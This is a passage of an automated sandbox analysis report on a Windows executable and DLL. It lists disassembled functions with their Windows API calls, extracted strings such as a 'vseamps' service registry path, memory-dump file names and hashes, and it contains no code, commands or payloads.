Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710

Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140001797
GetProcessHeap.KERNEL32 ref: 00000001400017A6
HeapAlloc.KERNEL32 ref: 00000001400017B4
lstrlenW.KERNEL32 ref: 00000001400017EC
GetProcessHeap.KERNEL32 ref: 00000001400017FB
HeapAlloc.KERNEL32 ref: 0000000140001809
lstrlenW.KERNEL32 ref: 000000014000183F
GetProcessHeap.KERNEL32 ref: 000000014000184E
HeapAlloc.KERNEL32 ref: 000000014000185C
lstrlenW.KERNEL32 ref: 000000014000188D
GetProcessHeap.KERNEL32 ref: 000000014000189C
HeapAlloc.KERNEL32 ref: 00000001400018AA

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID:
API String ID: 3424473247-0
Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700

Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140011270: RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

__GetUnwindTryBlock.LIBCMT ref: 0000000140012CDD
__SetUnwindTryBlock.LIBCMT ref: 0000000140012D05
__GetUnwindTryBlock.LIBCMT ref: 0000000140012D15
_SetThrowImageBase.LIBCMT ref: 0000000140012DA6

Strings

csm, xrefs: 0000000140012D2F
csm, xrefs: 0000000140012E97
csm, xrefs: 0000000140012DC1
bad exception, xrefs: 0000000140012E4A

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
String ID: bad exception$csm$csm$csm
API String ID: 3766904988-820278400
Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700

Function 00007FFE1A514804 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE1A514861

Part of subcall function 00007FFE1A516BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFE1A516C07
Part of subcall function 00007FFE1A516BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE1A516C2C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A514939
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE1A514B87
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A514C94

Strings

Rcl^i, xrefs: 00007FFE1A51481D
csm, xrefs: 00007FFE1A5148E2
csm, xrefs: 00007FFE1A51487B
csm, xrefs: 00007FFE1A51495C

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: Rcl^i$csm$csm$csm
API String ID: 849930591-1284302017
Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction ID: fd499993ccf6b9c91935bab5288eeea4ce333aaa0ffc7c6b8897070e7816e7d5
Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction Fuzzy Hash: 23D191B2B0CB4186EB609B66D4403BD7BB1FB46BA8F1051B6DA4D57B66DF38E481C700

Function 00007FFE1A51B86C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FFE1A51B9E8
GetProcAddress.KERNEL32 ref: 00007FFE1A51B9F4

Strings

api-ms-, xrefs: 00007FFE1A51B932
ext-ms-, xrefs: 00007FFE1A51B945
Rcl^i, xrefs: 00007FFE1A51B8A8, 00007FFE1A51B98D, 00007FFE1A51B9FF

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: Rcl^i$api-ms-$ext-ms-
API String ID: 3013587201-4287057529
Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction ID: 2bbef90cf95eb59c916a94d88193a724d16daee8ae5a7db9860beb69f51ae72f
Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction Fuzzy Hash: 9A41B165B1DE0291EA168B17A8106BA2392BF06FF0F5A45B7DD0E477A4FE3CE4468340

Function 00007FFE1A519444 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE1A519453
FlsGetValue.KERNEL32 ref: 00007FFE1A519468
FlsSetValue.KERNEL32 ref: 00007FFE1A519489
FlsSetValue.KERNEL32 ref: 00007FFE1A5194B6
FlsSetValue.KERNEL32 ref: 00007FFE1A5194C7
FlsSetValue.KERNEL32 ref: 00007FFE1A5194D8
SetLastError.KERNEL32 ref: 00007FFE1A5194F3

Strings

Rcl^i, xrefs: 00007FFE1A51944E

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: Value$ErrorLast
String ID: Rcl^i
API String ID: 2506987500-2241636769
Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction ID: 30ea2a9775190e9d0a7abad356b8981684c8d2552a67def043a4f5008471f38a
Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction Fuzzy Hash: 1A216F24B0CE4289FA69A36355911796163AF46FB0F1407F7E93E47AF6EE6CB4418240

Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140004A0F
LeaveCriticalSection.KERNEL32 ref: 0000000140004A1D
WaitForMultipleObjects.KERNEL32 ref: 0000000140004A44
Sleep.KERNEL32 ref: 0000000140004A75
EnterCriticalSection.KERNEL32 ref: 0000000140004A7F
SetEvent.KERNEL32 ref: 0000000140004AC5
ResetEvent.KERNEL32 ref: 0000000140004ACF
LeaveCriticalSection.KERNEL32 ref: 0000000140004AD9
WaitForMultipleObjects.KERNEL32 ref: 0000000140004B0D

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
String ID:
API String ID: 2707001247-0
Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708

Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014000169E
HeapFree.KERNEL32 ref: 00000001400016B0
GetProcessHeap.KERNEL32 ref: 00000001400016C0
HeapFree.KERNEL32 ref: 00000001400016D2
GetProcessHeap.KERNEL32 ref: 00000001400016E2
HeapFree.KERNEL32 ref: 00000001400016F4
GetProcessHeap.KERNEL32 ref: 0000000140001704
HeapFree.KERNEL32 ref: 0000000140001716
GetProcessHeap.KERNEL32 ref: 0000000140001726
HeapFree.KERNEL32 ref: 0000000140001738

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601

Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014001371E
HeapFree.KERNEL32 ref: 0000000140013730
GetProcessHeap.KERNEL32 ref: 0000000140013740
HeapFree.KERNEL32 ref: 0000000140013752
GetProcessHeap.KERNEL32 ref: 0000000140013762
HeapFree.KERNEL32 ref: 0000000140013774
GetProcessHeap.KERNEL32 ref: 0000000140013784
HeapFree.KERNEL32 ref: 0000000140013796
GetProcessHeap.KERNEL32 ref: 00000001400137A6
HeapFree.KERNEL32 ref: 00000001400137B8

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601

Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 0000000140002A3C
RegQueryValueExW.ADVAPI32 ref: 0000000140002A76
RegCloseKey.ADVAPI32 ref: 0000000140002A96
EnterCriticalSection.KERNEL32 ref: 0000000140002AAB
LeaveCriticalSection.KERNEL32 ref: 0000000140002B31

Strings

action, xrefs: 0000000140002A52
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002A0D

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 1119674940-1966266597
Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00

Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004BE7
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004BF6
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C04
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C3E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C4D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C5B
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C8E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C9D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004CAB

GetComputerNameW.KERNEL32 ref: 0000000140001991
lstrlenW.KERNEL32 ref: 000000014000199C
GetProcessHeap.KERNEL32 ref: 00000001400019AB
HeapAlloc.KERNEL32 ref: 00000001400019B9

Strings

ncalrpc, xrefs: 000000014000196D
Security=impersonation static true, xrefs: 0000000140001952
ampIfEp, xrefs: 000000014000195E

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen$ComputerName
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3702919091-996641649
Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00

Function 00007FFE1A514CD4 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 319COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A514E72
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A51519B

Strings

csm, xrefs: 00007FFE1A514E99
Rcl^i, xrefs: 00007FFE1A514CF0
csm, xrefs: 00007FFE1A514E1B
csm, xrefs: 00007FFE1A514DB9

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: Rcl^i$csm$csm$csm
API String ID: 3523768491-1284302017
Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction ID: 0617e5b028956466e08e3a571b01e219ec4ebd4f1838f5efbf8982716a2d8bad
Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction Fuzzy Hash: C4E1C472B0CB828AE7519F36D4402BD3BB1FB46B68F1411B6DA8D57666DF38E481C700

Function 00007FFE1A51BEA4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A51BF88

Strings

Rcl^i, xrefs: 00007FFE1A51BFA6
Rcl^i, xrefs: 00007FFE1A51BFB8
Rcl^i, xrefs: 00007FFE1A51BFD9, 00007FFE1A51C074
Rcl^i, xrefs: 00007FFE1A51BF9D
Rcl^i, xrefs: 00007FFE1A51BFAF

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Rcl^i$Rcl^i$Rcl^i$Rcl^i$Rcl^i
API String ID: 3215553584-1191785853
Opcode ID: d5ba8957eea0df6ac9012b1bd9f580ad15135f9835f767f61dc295af89370cb8
Instruction ID: 595457ecb9308fe0395c91f53cd587dfba8056fe41de759b550243500dd122ad
Opcode Fuzzy Hash: d5ba8957eea0df6ac9012b1bd9f580ad15135f9835f767f61dc295af89370cb8
Instruction Fuzzy Hash: 2D61C362F0CE0281FA659B67958423E66A3AF83FA0F1245F7CA0D577B5DE3DE841C640

Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700

Function 00007FFE1A51712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171B1
GetLastError.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171BF
LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171E9
FreeLibrary.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A517257
GetProcAddress.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A517263

Strings

api-ms-, xrefs: 00007FFE1A5171D1

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction ID: 5a141423fb5ada6dbdd1ba32ead31d9645ad61be14c52575c1722e978c5a716d
Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction Fuzzy Hash: 7C31B421B1EE4191EE159B47A4009B92396BF4AFB0F5906F7ED2D07760EF3CE4468700

Function 00007FFE1A520100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFE1A520131
GetLastError.KERNEL32 ref: 00007FFE1A52013D
CloseHandle.KERNEL32 ref: 00007FFE1A520155
CreateFileW.KERNEL32 ref: 00007FFE1A520180
WriteConsoleW.KERNEL32 ref: 00007FFE1A52019F

Strings

CONOUT$, xrefs: 00007FFE1A520161

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction ID: 22a65687c932797a1dd63702ae1da1b25bf2878d2e8631af4845515c2a202a38
Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction Fuzzy Hash: C9119A32B1CE41C2E3508B93A84473962A2BB89FF4F5002B7EA5D87BA4DF3CD9048744

Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
CreateEventW.KERNEL32 ref: 00000001400012C0

Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
